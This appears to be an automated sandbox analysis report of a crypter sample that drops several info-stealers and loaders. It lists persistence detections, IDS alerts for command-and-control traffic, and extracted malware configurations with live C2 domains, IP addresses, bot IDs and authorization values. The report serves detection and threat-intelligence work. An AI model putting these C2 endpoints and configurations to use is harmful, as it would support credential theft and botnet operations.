Author: Joe Security: Data: Command: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine|base64offset|contains: , Image: C:\Windows\System32\powercfg.exe, NewProcessName: C:\Windows\System32\powercfg.exe, OriginalFileName: C:\Windows\System32\powercfg.exe, ParentCommandLine: C:\Users\user\Documents\iofolko5\u7IEXZpDnp1f9d_IZKWnjEtv.exe, ParentImage: C:\Users\user\Documents\iofolko5\u7IEXZpDnp1f9d_IZKWnjEtv.exe, ParentProcessId: 7992, ParentProcessName: u7IEXZpDnp1f9d_IZKWnjEtv.exe, ProcessCommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, ProcessId: 4580, ProcessName: powercfg.exe

System Summary

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\Pictures\DreamifyCorp\ClientSecureUpdater.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe, ProcessId: 7984, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Dell

Sigma detected: Startup Folder File Write

Source: File created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe, ProcessId: 3124, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PowerExpertNNT.lnk

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, ProcessId: 1432, ProcessName: svchost.exe

Suricata Signatures

ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-21T14:49:04.004318+0200	2036289	2	Crypto Currency Mining Activity Detected	192.168.2.9	57472	1.1.1.1	53	UDP

ET JA3 Hash - [Abuse.ch] Possible Dridex

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-21T14:48:45.473784+0200	2028765	3	Unknown Traffic	192.168.2.9	49743	116.203.165.127	443	TCP
2024-09-21T14:48:47.475216+0200	2028765	3	Unknown Traffic	192.168.2.9	49746	116.203.165.127	443	TCP
2024-09-21T14:48:49.155853+0200	2028765	3	Unknown Traffic	192.168.2.9	49747	116.203.165.127	443	TCP
2024-09-21T14:48:51.096686+0200	2028765	3	Unknown Traffic	192.168.2.9	49751	116.203.165.127	443	TCP
2024-09-21T14:48:52.638117+0200	2028765	3	Unknown Traffic	192.168.2.9	49753	116.203.165.127	443	TCP
2024-09-21T14:48:55.858794+0200	2028765	3	Unknown Traffic	192.168.2.9	49754	116.203.165.127	443	TCP
2024-09-21T14:48:56.625756+0200	2028765	3	Unknown Traffic	192.168.2.9	49756	116.203.165.127	443	TCP
2024-09-21T14:49:00.380021+0200	2028765	3	Unknown Traffic	192.168.2.9	49757	116.203.165.127	443	TCP
2024-09-21T14:49:01.262485+0200	2028765	3	Unknown Traffic	192.168.2.9	49758	116.203.165.127	443	TCP
2024-09-21T14:49:02.729114+0200	2028765	3	Unknown Traffic	192.168.2.9	49760	116.203.165.127	443	TCP
2024-09-21T14:49:03.446407+0200	2028765	3	Unknown Traffic	192.168.2.9	49761	116.203.165.127	443	TCP
2024-09-21T14:49:05.708059+0200	2028765	3	Unknown Traffic	192.168.2.9	49763	116.203.165.127	443	TCP
2024-09-21T14:49:07.620133+0200	2028765	3	Unknown Traffic	192.168.2.9	49765	116.203.165.127	443	TCP
2024-09-21T14:49:09.447293+0200	2028765	3	Unknown Traffic	192.168.2.9	49766	116.203.165.127	443	TCP
2024-09-21T14:49:10.895143+0200	2028765	3	Unknown Traffic	192.168.2.9	49767	116.203.165.127	443	TCP
2024-09-21T14:49:12.300715+0200	2028765	3	Unknown Traffic	192.168.2.9	49768	116.203.165.127	443	TCP
2024-09-21T14:49:16.052524+0200	2028765	3	Unknown Traffic	192.168.2.9	49769	116.203.165.127	443	TCP
2024-09-21T14:49:18.007186+0200	2028765	3	Unknown Traffic	192.168.2.9	49770	116.203.165.127	443	TCP
2024-09-21T14:49:19.877574+0200	2028765	3	Unknown Traffic	192.168.2.9	49771	116.203.165.127	443	TCP
2024-09-21T14:49:22.732950+0200	2028765	3	Unknown Traffic	192.168.2.9	49773	116.203.165.127	443	TCP
2024-09-21T14:49:25.544839+0200	2028765	3	Unknown Traffic	192.168.2.9	49774	116.203.165.127	443	TCP
2024-09-21T14:49:27.944033+0200	2028765	3	Unknown Traffic	192.168.2.9	49775	116.203.165.127	443	TCP
2024-09-21T14:49:33.488490+0200	2028765	3	Unknown Traffic	192.168.2.9	49777	116.203.165.127	443	TCP
2024-09-21T14:49:36.410251+0200	2028765	3	Unknown Traffic	192.168.2.9	49780	116.203.165.127	443	TCP
2024-09-21T14:49:45.941056+0200	2028765	3	Unknown Traffic	192.168.2.9	49792	116.203.165.127	443	TCP
2024-09-21T14:49:48.219452+0200	2028765	3	Unknown Traffic	192.168.2.9	49796	116.203.165.127	443	TCP
2024-09-21T14:49:49.778702+0200	2028765	3	Unknown Traffic	192.168.2.9	49799	116.203.165.127	443	TCP
2024-09-21T14:49:51.535711+0200	2028765	3	Unknown Traffic	192.168.2.9	49801	116.203.165.127	443	TCP
2024-09-21T14:49:54.578245+0200	2028765	3	Unknown Traffic	192.168.2.9	49805	116.203.165.127	443	TCP
2024-09-21T14:49:59.573216+0200	2028765	3	Unknown Traffic	192.168.2.9	49812	116.203.165.127	443	TCP
2024-09-21T14:50:00.211972+0200	2028765	3	Unknown Traffic	192.168.2.9	49813	116.203.165.127	443	TCP
2024-09-21T14:50:04.284447+0200	2028765	3	Unknown Traffic	192.168.2.9	49818	116.203.165.127	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-21T14:49:35.003496+0200	2054653	1	A Network Trojan was detected	192.168.2.9	49779	172.67.173.81	443	TCP
2024-09-21T14:49:38.407829+0200	2054653	1	A Network Trojan was detected	192.168.2.9	49781	104.21.85.92	443	TCP
2024-09-21T14:49:42.075690+0200	2054653	1	A Network Trojan was detected	192.168.2.9	49787	172.67.173.81	443	TCP
2024-09-21T14:49:46.357534+0200	2054653	1	A Network Trojan was detected	192.168.2.9	49794	104.21.85.92	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-21T14:49:35.003496+0200	2049836	1	A Network Trojan was detected	192.168.2.9	49779	172.67.173.81	443	TCP
2024-09-21T14:49:38.407829+0200	2049836	1	A Network Trojan was detected	192.168.2.9	49781	104.21.85.92	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-21T14:49:42.075690+0200	2049812	1	A Network Trojan was detected	192.168.2.9	49787	172.67.173.81	443	TCP
2024-09-21T14:49:46.357534+0200	2049812	1	A Network Trojan was detected	192.168.2.9	49794	104.21.85.92	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (chickerkuso .shop in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-21T14:49:34.728572+0200	2056009	1	Domain Observed Used for C2 Detected	192.168.2.9	49779	172.67.173.81	443	TCP
2024-09-21T14:49:41.220148+0200	2056009	1	Domain Observed Used for C2 Detected	192.168.2.9	49787	172.67.173.81	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (questionmwq .shop in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-21T14:49:37.607786+0200	2056023	1	Domain Observed Used for C2 Detected	192.168.2.9	49781	104.21.85.92	443	TCP
2024-09-21T14:49:45.908027+0200	2056023	1	Domain Observed Used for C2 Detected	192.168.2.9	49794	104.21.85.92	443	TCP

ET MALWARE Redline Stealer TCP CnC - Id1Response

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-21T14:48:46.745662+0200	2043234	1	A Network Trojan was detected	193.233.255.84	4284	192.168.2.9	49745	TCP

ET MALWARE Redline Stealer TCP CnC Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-21T14:48:46.523820+0200	2043231	1	A Network Trojan was detected	192.168.2.9	49745	193.233.255.84	4284	TCP
2024-09-21T14:48:51.939916+0200	2043231	1	A Network Trojan was detected	192.168.2.9	49745	193.233.255.84	4284	TCP
2024-09-21T14:48:55.664418+0200	2043231	1	A Network Trojan was detected	192.168.2.9	49745	193.233.255.84	4284	TCP
2024-09-21T14:48:55.897035+0200	2043231	1	A Network Trojan was detected	192.168.2.9	49745	193.233.255.84	4284	TCP
2024-09-21T14:48:56.226962+0200	2043231	1	A Network Trojan was detected	192.168.2.9	49745	193.233.255.84	4284	TCP
2024-09-21T14:48:56.232234+0200	2043231	1	A Network Trojan was detected	192.168.2.9	49745	193.233.255.84	4284	TCP
2024-09-21T14:48:57.753719+0200	2043231	1	A Network Trojan was detected	192.168.2.9	49745	193.233.255.84	4284	TCP
2024-09-21T14:48:57.979757+0200	2043231	1	A Network Trojan was detected	192.168.2.9	49745	193.233.255.84	4284	TCP
2024-09-21T14:48:58.314046+0200	2043231	1	A Network Trojan was detected	192.168.2.9	49745	193.233.255.84	4284	TCP
2024-09-21T14:49:05.162152+0200	2043231	1	A Network Trojan was detected	192.168.2.9	49745	193.233.255.84	4284	TCP
2024-09-21T14:49:05.548457+0200	2043231	1	A Network Trojan was detected	192.168.2.9	49745	193.233.255.84	4284	TCP
2024-09-21T14:49:17.473958+0200	2043231	1	A Network Trojan was detected	192.168.2.9	49745	193.233.255.84	4284	TCP
2024-09-21T14:49:18.347277+0200	2043231	1	A Network Trojan was detected	192.168.2.9	49745	193.233.255.84	4284	TCP
2024-09-21T14:49:22.279030+0200	2043231	1	A Network Trojan was detected	192.168.2.9	49745	193.233.255.84	4284	TCP
2024-09-21T14:49:22.571458+0200	2043231	1	A Network Trojan was detected	192.168.2.9	49745	193.233.255.84	4284	TCP
2024-09-21T14:49:22.795755+0200	2043231	1	A Network Trojan was detected	192.168.2.9	49745	193.233.255.84	4284	TCP
2024-09-21T14:49:23.027049+0200	2043231	1	A Network Trojan was detected	192.168.2.9	49745	193.233.255.84	4284	TCP
2024-09-21T14:49:23.250649+0200	2043231	1	A Network Trojan was detected	192.168.2.9	49745	193.233.255.84	4284	TCP
2024-09-21T14:49:23.481145+0200	2043231	1	A Network Trojan was detected	192.168.2.9	49745	193.233.255.84	4284	TCP
2024-09-21T14:49:23.722893+0200	2043231	1	A Network Trojan was detected	192.168.2.9	49745	193.233.255.84	4284	TCP
2024-09-21T14:49:32.809731+0200	2043231	1	A Network Trojan was detected	192.168.2.9	49745	193.233.255.84	4284	TCP
2024-09-21T14:49:50.728631+0200	2043231	1	A Network Trojan was detected	192.168.2.9	49745	193.233.255.84	4284	TCP
2024-09-21T14:49:50.951644+0200	2043231	1	A Network Trojan was detected	192.168.2.9	49745	193.233.255.84	4284	TCP
2024-09-21T14:49:51.173742+0200	2043231	1	A Network Trojan was detected	192.168.2.9	49745	193.233.255.84	4284	TCP
2024-09-21T14:49:51.490264+0200	2043231	1	A Network Trojan was detected	192.168.2.9	49745	193.233.255.84	4284	TCP

ET MALWARE Redline Stealer/MetaStealer Family Activity (Response)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-21T14:48:55.669580+0200	2046056	1	A Network Trojan was detected	193.233.255.84	4284	192.168.2.9	49745	TCP

ET MALWARE Single char EXE direct download likely trojan (multiple families)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-21T14:48:08.851174+0200	2018581	1	A Network Trojan was detected	192.168.2.9	49712	103.130.147.211	80	TCP
2024-09-21T14:48:09.021938+0200	2018581	1	A Network Trojan was detected	192.168.2.9	49712	103.130.147.211	80	TCP

ET MALWARE Suspected Smokeloader Activity (POST)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-21T14:50:17.802828+0200	2039103	1	A Network Trojan was detected	192.168.2.9	49829	62.150.232.50	80	TCP
2024-09-21T14:50:19.044784+0200	2039103	1	A Network Trojan was detected	192.168.2.9	49830	62.150.232.50	80	TCP
2024-09-21T14:50:20.423036+0200	2039103	1	A Network Trojan was detected	192.168.2.9	49831	62.150.232.50	80	TCP
2024-09-21T14:50:21.651440+0200	2039103	1	A Network Trojan was detected	192.168.2.9	49833	62.150.232.50	80	TCP
2024-09-21T14:50:22.851621+0200	2039103	1	A Network Trojan was detected	192.168.2.9	49835	62.150.232.50	80	TCP
2024-09-21T14:50:24.030669+0200	2039103	1	A Network Trojan was detected	192.168.2.9	49838	62.150.232.50	80	TCP
2024-09-21T14:50:25.382494+0200	2039103	1	A Network Trojan was detected	192.168.2.9	49840	62.150.232.50	80	TCP
2024-09-21T14:50:26.600892+0200	2039103	1	A Network Trojan was detected	192.168.2.9	49843	62.150.232.50	80	TCP

ET MALWARE Vidar Stealer Form Exfil

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-21T14:49:39.736965+0200	2054495	1	A Network Trojan was detected	192.168.2.9	49784	45.132.206.251	80	TCP

ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-21T14:48:41.408032+0200	2054350	1	A Network Trojan was detected	192.168.2.9	49739	5.53.124.195	80	TCP
2024-09-21T14:48:55.457255+0200	2054350	1	A Network Trojan was detected	192.168.2.9	49755	5.53.124.195	80	TCP
2024-09-21T14:49:07.617661+0200	2054350	1	A Network Trojan was detected	192.168.2.9	49764	5.53.124.195	80	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (chickerkuso .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-21T14:49:33.942101+0200	2056008	1	Domain Observed Used for C2 Detected	192.168.2.9	63350	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (questionmwq .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-21T14:49:37.126950+0200	2056022	1	Domain Observed Used for C2 Detected	192.168.2.9	55742	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sentistivowmi .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-21T14:49:33.724983+0200	2055834	1	Domain Observed Used for C2 Detected	192.168.2.9	57707	1.1.1.1	53	UDP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-21T14:48:51.791197+0200	2044247	1	Malware Command and Control Activity Detected	116.203.165.127	443	192.168.2.9	49751	TCP
2024-09-21T14:49:52.227581+0200	2044247	1	Malware Command and Control Activity Detected	116.203.165.127	443	192.168.2.9	49801	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-21T14:48:53.441147+0200	2051831	1	Malware Command and Control Activity Detected	116.203.165.127	443	192.168.2.9	49753	TCP
2024-09-21T14:49:55.295023+0200	2051831	1	Malware Command and Control Activity Detected	116.203.165.127	443	192.168.2.9	49805	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-21T14:48:49.994066+0200	2049087	1	A Network Trojan was detected	192.168.2.9	49747	116.203.165.127	443	TCP

ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-21T14:48:46.523820+0200	2046045	1	A Network Trojan was detected	192.168.2.9	49745	193.233.255.84	4284	TCP

ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-21T14:49:37.890382+0200	2049467	1	A Network Trojan was detected	192.168.2.9	49782	185.196.8.214	80	TCP
2024-09-21T14:49:39.706883+0200	2049467	1	A Network Trojan was detected	192.168.2.9	49783	185.196.8.214	80	TCP
2024-09-21T14:49:40.763392+0200	2049467	1	A Network Trojan was detected	192.168.2.9	49785	185.196.8.214	80	TCP
2024-09-21T14:49:42.462025+0200	2049467	1	A Network Trojan was detected	192.168.2.9	49788	185.196.8.214	80	TCP
2024-09-21T14:49:43.415108+0200	2049467	1	A Network Trojan was detected	192.168.2.9	49790	185.196.8.214	80	TCP
2024-09-21T14:49:44.874094+0200	2049467	1	A Network Trojan was detected	192.168.2.9	49791	185.196.8.214	80	TCP
2024-09-21T14:49:45.981364+0200	2049467	1	A Network Trojan was detected	192.168.2.9	49793	185.196.8.214	80	TCP
2024-09-21T14:49:46.904866+0200	2049467	1	A Network Trojan was detected	192.168.2.9	49795	185.196.8.214	80	TCP
2024-09-21T14:49:48.268760+0200	2049467	1	A Network Trojan was detected	192.168.2.9	49797	185.196.8.214	80	TCP
2024-09-21T14:49:49.232949+0200	2049467	1	A Network Trojan was detected	192.168.2.9	49798	185.196.8.214	80	TCP
2024-09-21T14:49:50.828101+0200	2049467	1	A Network Trojan was detected	192.168.2.9	49800	185.196.8.214	80	TCP
2024-09-21T14:49:51.791934+0200	2049467	1	A Network Trojan was detected	192.168.2.9	49802	185.196.8.214	80	TCP
2024-09-21T14:49:52.656211+0200	2049467	1	A Network Trojan was detected	192.168.2.9	49804	185.196.8.214	80	TCP
2024-09-21T14:49:54.622756+0200	2049467	1	A Network Trojan was detected	192.168.2.9	49806	185.196.8.214	80	TCP
2024-09-21T14:49:55.841149+0200	2049467	1	A Network Trojan was detected	192.168.2.9	49807	185.196.8.214	80	TCP
2024-09-21T14:49:57.301999+0200	2049467	1	A Network Trojan was detected	192.168.2.9	49808	185.196.8.214	80	TCP
2024-09-21T14:49:58.238002+0200	2049467	1	A Network Trojan was detected	192.168.2.9	49809	185.196.8.214	80	TCP
2024-09-21T14:49:59.676744+0200	2049467	1	A Network Trojan was detected	192.168.2.9	49811	185.196.8.214	80	TCP
2024-09-21T14:50:00.567593+0200	2049467	1	A Network Trojan was detected	192.168.2.9	49814	185.196.8.214	80	TCP
2024-09-21T14:50:01.420447+0200	2049467	1	A Network Trojan was detected	192.168.2.9	49815	185.196.8.214	80	TCP
2024-09-21T14:50:02.374107+0200	2049467	1	A Network Trojan was detected	192.168.2.9	49816	185.196.8.214	80	TCP
2024-09-21T14:50:04.315801+0200	2049467	1	A Network Trojan was detected	192.168.2.9	49817	185.196.8.214	80	TCP
2024-09-21T14:50:05.927417+0200	2049467	1	A Network Trojan was detected	192.168.2.9	49819	185.196.8.214	80	TCP
2024-09-21T14:50:06.973593+0200	2049467	1	A Network Trojan was detected	192.168.2.9	49820	185.196.8.214	80	TCP
2024-09-21T14:50:07.916699+0200	2049467	1	A Network Trojan was detected	192.168.2.9	49821	185.196.8.214	80	TCP
2024-09-21T14:50:08.874848+0200	2049467	1	A Network Trojan was detected	192.168.2.9	49822	185.196.8.214	80	TCP
2024-09-21T14:50:09.959603+0200	2049467	1	A Network Trojan was detected	192.168.2.9	49823	185.196.8.214	80	TCP
2024-09-21T14:50:10.962742+0200	2049467	1	A Network Trojan was detected	192.168.2.9	49824	185.196.8.214	80	TCP
2024-09-21T14:50:11.927391+0200	2049467	1	A Network Trojan was detected	192.168.2.9	49825	185.196.8.214	80	TCP
2024-09-21T14:50:13.730144+0200	2049467	1	A Network Trojan was detected	192.168.2.9	49826	185.196.8.214	80	TCP
2024-09-21T14:50:15.583568+0200	2049467	1	A Network Trojan was detected	192.168.2.9	49827	185.196.8.214	80	TCP
2024-09-21T14:50:16.500899+0200	2049467	1	A Network Trojan was detected	192.168.2.9	49828	185.196.8.214	80	TCP
2024-09-21T14:50:20.419092+0200	2049467	1	A Network Trojan was detected	192.168.2.9	49832	185.196.8.214	80	TCP
2024-09-21T14:50:20.785479+0200	2049467	1	A Network Trojan was detected	192.168.2.9	49832	185.196.8.214	80	TCP
2024-09-21T14:50:21.603699+0200	2049467	1	A Network Trojan was detected	192.168.2.9	49834	185.196.8.214	80	TCP
2024-09-21T14:50:22.443868+0200	2049467	1	A Network Trojan was detected	192.168.2.9	49836	185.196.8.214	80	TCP
2024-09-21T14:50:23.262577+0200	2049467	1	A Network Trojan was detected	192.168.2.9	49837	185.196.8.214	80	TCP
2024-09-21T14:50:24.104661+0200	2049467	1	A Network Trojan was detected	192.168.2.9	49839	185.196.8.214	80	TCP
2024-09-21T14:50:24.935483+0200	2049467	1	A Network Trojan was detected	192.168.2.9	49841	185.196.8.214	80	TCP
2024-09-21T14:50:25.745759+0200	2049467	1	A Network Trojan was detected	192.168.2.9	49842	185.196.8.214	80	TCP

ETPRO MALWARE Amadey CnC Activity M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-21T14:49:19.905417+0200	2856147	1	A Network Trojan was detected	192.168.2.9	49772	45.202.35.101	80	TCP

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-21T14:48:09.021938+0200	2803270	2	Potentially Bad Traffic	192.168.2.9	49712	103.130.147.211	80	TCP
2024-09-21T14:48:09.432484+0200	2803270	2	Potentially Bad Traffic	192.168.2.9	49711	147.45.44.104	80	TCP
2024-09-21T14:48:09.443354+0200	2803270	2	Potentially Bad Traffic	192.168.2.9	49713	176.113.115.33	80	TCP
2024-09-21T14:48:09.573759+0200	2803270	2	Potentially Bad Traffic	192.168.2.9	49709	147.45.44.104	80	TCP
2024-09-21T14:48:09.642506+0200	2803270	2	Potentially Bad Traffic	192.168.2.9	49718	176.111.174.109	80	TCP
2024-09-21T14:48:10.468985+0200	2803270	2	Potentially Bad Traffic	192.168.2.9	49709	147.45.44.104	80	TCP
2024-09-21T14:48:10.625354+0200	2803270	2	Potentially Bad Traffic	192.168.2.9	49726	162.241.61.218	443	TCP
2024-09-21T14:48:10.640521+0200	2803270	2	Potentially Bad Traffic	192.168.2.9	49729	162.241.61.218	443	TCP
2024-09-21T14:48:10.682067+0200	2803270	2	Potentially Bad Traffic	192.168.2.9	49709	147.45.44.104	80	TCP
2024-09-21T14:48:10.933255+0200	2803270	2	Potentially Bad Traffic	192.168.2.9	49725	185.166.143.48	443	TCP
2024-09-21T14:48:11.772275+0200	2803270	2	Potentially Bad Traffic	192.168.2.9	49731	162.241.61.218	443	TCP
2024-09-21T14:48:12.772362+0200	2803270	2	Potentially Bad Traffic	192.168.2.9	49711	147.45.44.104	80	TCP
2024-09-21T14:48:13.239610+0200	2803270	2	Potentially Bad Traffic	192.168.2.9	49711	147.45.44.104	80	TCP
2024-09-21T14:48:15.698202+0200	2803270	2	Potentially Bad Traffic	192.168.2.9	49711	147.45.44.104	80	TCP
2024-09-21T14:49:30.781974+0200	2803270	2	Potentially Bad Traffic	192.168.2.9	49776	147.45.44.104	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\vsfdhgg15[1].exe

Avira: detection malicious, Label: TR/Dropper.Gen

Found malware configuration

Source: 0000000B.00000002.1884059760.0000000003265000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199780418869"], "Botnet": "3a15237aa92dcd8ccca447211fb5fc2a"}
Source: 0000000C.00000002.2512039458.0000000002610000.00000004.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://nwgrus.ru/tmp/index.php", "http://tech-servers.in.net/tmp/index.php", "http://unicea.ws/tmp/index.php"]}
Source: 0000000D.00000002.1840912575.00000000037B5000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: RedLine {"C2 url": "193.233.255.84:4284", "Bot Id": "LogsDiller Cloud (TG: @logsdillabot)", "Authorization Header": "3a050df92d0cf082b2cdaf87863616be"}
Source: 15.2.h687rYoqxN2Ss_wvNXD9qqhf.exe.5ca3f2.1.unpack	Malware Configuration Extractor: Amadey {"C2 url": "45.202.35.101/pLQvfD4d/index.php", "Version": "4.42", "Install Folder": "9d94d7e7d6", "Install File": "Hkbsse.exe"}
Source: 17.2.jsh_U9TvBUPPM2QGPo3kny24.exe.c00087e000.2.unpack	Malware Configuration Extractor: LummaC {"C2 url": ["opponnentduei.shop", "chickerkuso.shop", "sentistivowmi.shop", "metallygaricwo.shop", "quotamkdsdqo.shop", "achievenmtynwjq.shop", "milldymarskwom.shop", "carrtychaintnyw.shop", "puredoffustow.shop"], "Build id": "a8kafm--@cloudcosmic"}
Source: v7u3knm8W6_1U6jDWPH31qsx.exe.7932.9.memstrmin	Malware Configuration Extractor: Cryptbot {"C2 list": ["f20pt.top", "analforeverlovyu.top", "tventyvf20pt.top", "+tventyvf20pt.top", "pt.top", "@tventyvf20pt.top", "tyvf20pt.top"]}

Multi AV Scanner detection for domain / URL

Source: nerv.com.pe

Virustotal: Detection: 6%

Perma Link

Multi AV Scanner detection for dropped file

Source: C:\ProgramData\AKEGHIJJEH.exe	ReversingLabs: Detection: 79%
Source: C:\ProgramData\AKEGHIJJEH.exe	Virustotal: Detection: 69%	Perma Link
Source: C:\ProgramData\ejitkpfdxvzt\orpqcnvisucm.exe	ReversingLabs: Detection: 54%
Source: C:\ProgramData\ejitkpfdxvzt\orpqcnvisucm.exe	Virustotal: Detection: 64%	Perma Link
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	ReversingLabs: Detection: 42%
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Virustotal: Detection: 32%	Perma Link
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exeWqTnzVEcT35t5u1k (copy)	ReversingLabs: Detection: 42%
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exeWqTnzVEcT35t5u1k (copy)	Virustotal: Detection: 32%	Perma Link
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe	ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe	Virustotal: Detection: 32%	Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\66ea645129e6a_jacobs[1].exe	ReversingLabs: Detection: 54%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\66ea645129e6a_jacobs[1].exe	Virustotal: Detection: 64%	Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\66ecb454d2b4a_lgfdsjgds[1].exe	ReversingLabs: Detection: 79%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\66ecb454d2b4a_lgfdsjgds[1].exe	Virustotal: Detection: 69%	Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\vfsdgdf[1].exe	ReversingLabs: Detection: 26%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\vfsdgdf[1].exe	Virustotal: Detection: 39%	Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\66ebb3bf78bd6_Send[1].exe	ReversingLabs: Detection: 62%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\66ebb3bf78bd6_Send[1].exe	Virustotal: Detection: 55%	Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\easyfirewall[1].exe	ReversingLabs: Detection: 13%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\easyfirewall[1].exe	Virustotal: Detection: 26%	Perma Link

Multi AV Scanner detection for submitted file

Source: SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe	ReversingLabs: Detection: 71%
Source: SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe	Virustotal: Detection: 42%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe	Joe Sandbox ML: detected
